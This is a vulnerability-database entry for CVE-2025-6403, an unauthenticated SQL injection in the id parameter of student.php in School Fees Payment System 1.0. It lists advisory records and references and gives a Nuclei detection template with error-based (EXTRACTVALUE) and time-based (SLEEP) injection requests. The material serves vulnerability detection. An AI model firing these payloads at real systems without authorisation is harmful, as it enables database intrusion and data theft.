| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-6403 | 21 Jun 202510:43 | โ | circl | |
| Code-Projects School Fees Payment System ๆณจๅ ฅๆผๆด | 21 Jun 202500:00 | โ | cnnvd | |
| School Fees Payment System student.php File SQL Injection Vulnerability | 27 Jun 202500:00 | โ | cnvd | |
| CVE-2025-6403 | 21 Jun 202510:00 | โ | cve | |
| CVE-2025-6403 code-projects School Fees Payment System student.php sql injection | 21 Jun 202510:00 | โ | cvelist | |
| EUVD-2025-18809 | 3 Oct 202520:07 | โ | euvd | |
| CVE-2025-6403 | 21 Jun 202510:15 | โ | nvd | |
| CVE-2025-6403 | 21 Jun 202510:15 | โ | osv | |
| PT-2025-26499 ยท Code Projects ยท School Fees Payment System | 21 Jun 202500:00 | โ | ptsecurity | |
| CVE-2025-6403 | 23 Jun 202510:41 | โ | redhatcve |
| Source | Link |
|---|---|
| cve | www.cve.org/CVERecord |
| avd | www.avd.aquasec.com/nvd/2025/cve-2025-6403/ |
| github | www.github.com/tuooo/CVE/issues/16 |
| vuldb | www.vuldb.com/ |
| code-projects | www.code-projects.org/ |
id: CVE-2025-6403
info:
name: Code-Projects School Fees Payment System 1.0 - SQL Injection
author: hnd3884
severity: critical
description: |
A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
impact: |
Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or modification.
remediation: |
Update to the latest version.
reference:
- https://www.cve.org/CVERecord?id=CVE-2025-6403
- https://avd.aquasec.com/nvd/2025/cve-2025-6403/
- https://github.com/tuooo/CVE/issues/16
- https://vuldb.com/?id.313335
- https://code-projects.org/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-6403
cwe-id: CWE-74
epss-score: 0.017
epss-percentile: 0.74316
cpe: cpe:2.3:a:code-projects:school_fees_payment_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
tags: cve,cve2025,sqli,code_projects,unauth,school_fees_payment_system,time-based,vkev
flow: http(1) || http(2)
http:
- raw:
- |
GET /student.php?action=delete&id=1'+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,VERSION()))--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "XPATH syntax error")'
condition: and
- raw:
- |
GET /student.php?action=delete&id=1'+AND+SLEEP(7)--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 7'
- 'status_code == 302'
- 'contains(body, "login.php")'
condition: and
# digest: 4a0a00473045022100a5409a667f818bba7e040fbe7b8b7ad825f8e10d54acfae4242cdb40bbe0f11c02207b6b346e52b99a51d73dd368fcdba60b4ba92ca3f47ecc16dc30a3495a879308:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation